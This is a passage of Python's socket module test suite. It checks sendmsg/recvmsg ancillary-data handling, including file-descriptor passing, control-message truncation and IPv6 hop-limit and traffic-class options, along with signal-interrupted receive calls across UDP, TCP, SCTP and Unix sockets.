self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
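    # Opt-in pattern that the receive-side helpers below follow (a sketch):
    #   sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
    #   msg, ancdata, flags, addr = sock.recvmsg(len(MSG), ancbufsize)
    #   # ancdata then holds (IPPROTO_IPV6, IPV6_HOPLIMIT, 4-byte int)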
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
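# Illustrative sketch (defined for reference, never called by the
# tests): how CMSG_LEN() and CMSG_SPACE() relate when sizing the
# ancillary buffers used in the truncation tests above.  Assumes a
# POSIX platform that exposes both functions.
def _example_cmsg_buffer_sizing():
    import socket
    import struct
    payload = struct.calcsize("i")  # one C int, as in SIZEOF_INT
    # CMSG_LEN(n) is the exact size of one header plus n data bytes;
    # any smaller receive buffer truncates the item (MSG_CTRUNC).
    exact = socket.CMSG_LEN(payload)
    # CMSG_SPACE(n) adds alignment padding; use it to leave room for
    # a second ancillary item after the first.
    padded = socket.CMSG_SPACE(payload)
    assert padded >= exact
    return exact, padded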
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs a SIGALRM
# handler that raises ZeroDivisionError and removes it on teardown,
# along with any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises ZeroDivisionError when
# interrupted by a signal (the SIGALRM handler divides by zero).
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
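# Illustrative sketch (defined for reference, never called by the
# tests): the PEP 475 pattern the classes above rely on.  An
# interrupted system call is retried automatically unless the signal
# handler raises, so these tests install a handler that raises
# ZeroDivisionError and assert that very exception.  Assumes a POSIX
# platform with signal.setitimer().
def _example_interrupted_recv():
    import signal
    import socket
    def handler(signum, frame):
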